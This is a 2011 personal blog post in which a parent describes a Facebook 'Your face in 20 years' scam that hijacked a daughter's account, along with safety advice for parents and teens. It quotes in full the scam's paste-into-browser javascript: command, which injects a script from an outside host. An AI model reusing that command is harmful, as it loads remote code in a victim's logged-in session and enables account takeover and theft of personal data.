Tuesday, May 03, 2011

Facebook Spam: Your Face in 20 Years

facebook_spamThis is just a heads-up to you other Facebook users out there. I logged into my Facebook account this afternoon to find out my daughter had been the victim of yet another of the daily Facebook viruses. This one seems to be mostly inane and harmless with the exception that it seems to spam everyone  you know via both wall posts and messages. If it has more damaging effects I’ve yet to uncover them.

So I thought I’d take a moment and write about how to tell if a message or wall post you receive seems to be spam.

 

 

 

Message Spam

Here’s the message I got from my daughter today on my Facebook:

 

spam message

On the surface it looks innocent enough. I especially like the “whoops sorry meant to send that to someone else” comment they used to make you think it was a real message intended for another person. I only picked up on it because that’s not the traditional diction my daughter uses when she chats. She’d have said something more like “Did u c this yet? It’s pretty funn. C wat u luk like 20 yrs older” Hey.. imagine that.. +1 point for spammers being too stupid to keep up on the lingo! At least I’m not the only one not in-tune with today’s kids!

 

Rather than click on the message I clicked on her wall instead. This is what I saw: ( It’s slightly shrunk down to make it fit on this page, but you get the point.) Even my child, as internet-addicted as she is, wouldn’t spend the hour it takes to manually post the exact same message to 90 of her friend’s walls on Facebook.

spam list

 

If you click on any of the links you see the person’s wall and this is the post it makes:

spam app

Ok.. this too seems innocent enough.. almost, but I was still slightly bugged by the whole repeated posting thing. As I looked on her friend’s walls I could see where she had most likely been infected from one of their messages because over half her friends were infected with the same posting and they appeared before hers did by minutes to hours, depending on the person.

Knowing I’ve got enough sense NOT to get infected I figured I was safe trying to figure out what all this link does. When you clink on the link it takes you to an official Facebook App page, located at:

http://www.facebook.com/pages/Your-face-in-20-years/121085477971294

(I’ve already reported the app to Facebook as a scam and hopefully it will get removed soon enough.)

This is what the app page looks like.

WARNING: Though the app page itself causes no harm, do NOT follow it’s instructions or you WILL get infected.
To save you the curiosity I took a screen capture of the app page. This is what you would see there:

spam page

Right off the bat you can tell something is wrong here. Don’t EVER EVER EVER copy and paste code from an app into your browser window. No legitimate application on facebook would use that as a way to access itself.

Basically this app tells you to copy that code and paste it into your browser window and then press enter.

If you look closely at the code, to any normal naïve user it looks harmless. The address is (DO NOT CLICK THIS LINK BELOW)

javascript:(a=(b=document).createElement('script')).src='//changeups.info/age/u.php?'+Math.random(),b.body.appendChild(a);void(0)

Basically that’s a command to open the Javascript engine on your computer, and navigate to a site called changeups.info, which with a little digging I found is located and hosted in Switzerland. I’m not exactly sure what the script does, because I don’t want to risk getting infected either, but this is a good example of a spam attack that bypasses your antivirus application. By entering that into your browser you’re basically telling the computer I WANT to go here and execute this script, no matter what the script is.

Most likely the script copies cookies from your browser’s memory to get at your facebook password (which you stored moments earlier when you were on the facebook site). Now it has your logon, your password, and 100% access to post on Facebook as you.

In less than an hour tonight, there were hundreds of my daughter’s contacts and friends infected and that was without me having to take the time to actually look in-depth to find out more about the scam.

 

In short, unless you KNOW it’s a trusted application, always send a message or email to the person who sent you this kind of link to verify they meant to do so. I simply called my daughter tonight and asked her “Did you intentionally waste an hour today posting links to hundreds of peope on facebook?” She said “Uhh.. no. Why?” Well there ya go.. she got hacked. Knowing my daughter uses her facebook password as her email password, now some hacker in Switzerland has access to all my daughter’s personal information.  Assuming the worst case scenario I took a look at my daughter’s email account with only the information the hacker would have if they were me and found out all I could in 60 seconds or less. If this were actually used to get at my kid, I would now know the following:

  • Her full name
  • Age
  • Email address and password
  • All her facebook friends.
  • Father and Mother’s names and facebook accounts and email addresses.
  • The name, age, and info of every relative she has on facebook.
  • Her church and what time her youth group meets, and where they meet this week. (so I’d know how to stalk her)
  • That she’s in the high school band, and her band director’s name.
  • What events her band is doing, when, and where. (so I’d know how to stalk her)
  • How to communicate with her on Skype, google talk, facebook, and every other chat program she uses.

I found out all this in under one minute with only the knowledge gained from her Facebook login and password.

So, what’s the lesson parents and kids?

  • Be careful what you click on on social networking sites.
  • Don’t EVER use an app that requires you to copy and paste code at all.
  • Don’t respond or click on messages or wall posts that you REALLY don’t know are safe.
  • Don’t ever have your Facebook and email passwords the same. EVER EVER EVER EVER EVER! (I know I stutter, but I mean that.. EVER!)
  • Don’t assume that because you got it from a trusted source that it’s OK.

I hope the rest of you out there in the web-o-sphere have a great night and that maybe this prevents you from falling victim to the same thing.

2 comments:

  1. Didn't finish reading the whole post yet but I got the same thing. Thanks for posting this. I knew something was not right about it, just had to confirm it.

    ReplyDelete

Thanks for taking a moment to leave a comment! Please keep the language clean. (If you are considering spamming the blog, don't bother. It's going to be deleted anyway.)